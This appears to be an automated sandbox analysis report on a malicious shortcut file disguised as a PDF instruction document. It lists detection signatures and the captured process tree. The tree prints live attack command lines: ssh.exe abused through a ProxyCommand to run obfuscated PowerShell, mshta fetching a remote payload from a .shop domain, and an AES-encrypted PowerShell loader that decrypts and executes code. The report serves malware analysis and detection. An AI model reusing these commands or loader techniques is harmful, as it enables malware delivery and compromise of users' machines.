Edit tour
Windows
Analysis Report
https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Powershell Download and Execute IEX
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Suspicious powershell command line found
Yara detected Generic Downloader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Lolbin Ssh.exe Use As Proxy
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- chrome.exe (PID: 984 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) - chrome.exe (PID: 6008 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2232 --fi eld-trial- handle=200 8,i,183724 2287355282 7716,27154 3428521175 7034,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- chrome.exe (PID: 2884 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://downl oad-695-18 811-018-we bdav-logic aldoc.cdn- serveri473 1-ns.shop/ Documents/ Instructio n_695-1801 4-012_Rev. PDF.lnk" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
- OpenWith.exe (PID: 6268 cmdline:
C:\Windows \system32\ OpenWith.e xe -Embedd ing MD5: E4A834784FA08C17D47A1E72429C5109) - MpCmdRun.exe (PID: 2708 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: B3676839B2EE96983F9ED735CD044159) - conhost.exe (PID: 3576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 7440 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- ssh.exe (PID: 7704 cmdline:
"C:\Window s\System32 \OpenSSH\s sh.exe" -o Pr oxyCommand ="powershe ll powersh ell -Comma nd 'mU_<AT wLQ=>WqAms hta https: //static.k lipmybekoe .shop/5MV6 U.mp4mU_<A TwLQ=>WqA' .SubString (14, 47)" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC) - conhost.exe (PID: 7752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7868 cmdline:
powershell powershel l -Command 'mU_<ATwL Q=>WqAmsht a https:// static.kli pmybekoe.s hop/5MV6U. mp4mU_<ATw LQ=>WqA'.S ubString(1 4, 47) MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 8000 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " mshta http s://static .klipmybek oe.shop/5M V6U.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 8092 cmdline:
"C:\Window s\system32 \mshta.exe " https:// static.kli pmybekoe.s hop/5MV6U. mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 5444 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction RFpf E($qAFB){r eturn -spl it ($qAFB -replace ' ..', '0x$& ')};$CLkA U = RFpfE( 'F6A906EA9 A8B03BF898 2351A6A2E7 F5601882A3 C15DC699E3 27C9FD9263 B8CC4B78E4 5D1498DA21 901CB01F8E E21A81F894 23EDE39C43 E4445F86F1 00145C78A2 54E490087C 167A8FCDE9 AB218491ED 0390CACB6A FB8FA9DB17 8377E3692D 7890E22084 42D0DD53C8 D81A98ADF5 E41401F6EC 8AF5E5E93E 92E92C36F1 0387F113BA E0E14E5154 0D2403F393 D3BA854400 0D12628DA6 AE647EB440 03EA36C928 710911689A 7C08F64791 7F48BCFF8A 16D809736B 319C8C6D12 0509449D4D 908CBB00B9 B3968A0264 F0D00C1364 5E8839D472 B1FC2526A1 0F919B7051 E20380EC70 097EFA1DDB 8920157957 F22E28530A 6B1103EAB5 1B4ADB7C8A 7FF8C77563 48170B5A84 2F52100EC7 76BEE97CEE 285636BB3D 580D3A7903 B8B981EFA0 47E102E320 AEE9A19897 CC68457DD1 6FBEDEE177 C3F3380508 FB7C5D541C 078FFC435E 191D6EB52A A039F2EEA8 CD38EBA3FC 25F9923C5B C673060E86 83A1AEDE8D 9B835DD807 0763F93565 72D1D85A96 981C2F8326 E8E1344B45 EC0A84F20D 7854521846 47540978C6 1E331B68CF FFA60EA7EA 10FE603D92 4EC3BC680C 9289327BCC AADD415AA7 B64A5A9569 DB1D72DA21 B969668306 D3276D60EC 4C42EEE420 7D341C503F 8521E0607B 70A5CC9DB9 1371C16084 C8D11303CA 3DA1A2E008 A7149BD890 A38EEE37EE A63A901FE1 D9D9F37881 1B950CF33C 565A4082C4 FE668A955A 639FA75786 99ADDF819B DDBA0F1569 5838BB098B F5B128542F 631ECE9DEF 5BD905CD17 32F31E0566 86D623BCD5 039FC9DDEC 74DDA666D6 2AC11454F8 B9041F83E9 FF96C0900A DD4250ABE7 3F4218ED17 4ECD8C5DE8 E12B5E9AA9 8785D96377 360B4EFFEB B72B3D8569 0B96F86CA5 F386E54C64 7E80B3EB73 551FFBFBA8 E1AC325311 CF6B9CFCDD F855EFB419 4FD7806925 E6E20AEC7A 8A4832597F 78D6B3B3A0 5044A2A70D 014DE815B9 DCD4964187 B56C4550CA A047A06D32 5827E7A0C7 8021FA7883 64258976E4 F05BF34D87 13C34B9718 00E7673392 3D64C7E44C 914B597BF6 7AF87BEACF 301F8BBE82 829B975012 AB505B025B 56F2EDAC8F ACAC1E9394 E7DE9A7B5D 1B17F43BCA A9DAAEBA53 9F9AD1A94A 8FB04E2D6A 81C28F2202 ACD2521D0D 9F6A81CD76 A6B37B78E8 A56DC50272 9F8842DDA0 4E915E9079 66BF28DEFF 880103C0EA 91F78F5EF0 767158F737 693FA24122 559B72F63D 01B727410C A885A6A1E2 62317F081B 8BC62E83ED 1908661D47 DBB97B9E1C FFCECB827F D80AE79346 3F2B92C66A 2BB43865FF 371643B83E 017909EF24 426E1537F2 3C3358D3B8 B0930E585F D05ACE55BD 064681A48A 7E4FB064E0 FC093C1E91 2C0E8BC84E 3419E3A980 9B3D6FF420 C3839DCBD8 FEF438B40F 88753FB77C 0743BCE75E 544C62182B 0FEEA97C04 1D7B18457E 6584778F22 EDEF366720 15D59B8682 037DEDBF66 4F5134470' );$vDlAX=- join [char []](([Secu rity.Crypt ography.Ae s]::Create ()).Create Decryptor( (RFpfE('5A 4C72435A78 5445547679 6A794D454C ')),[byte[ ]]::new(16 )).Transfo rmFinalBlo ck($CLkAU, 0,$CLkAU.L ength)); & $vDlAX.Su bstring(0, 3) $vDlAX.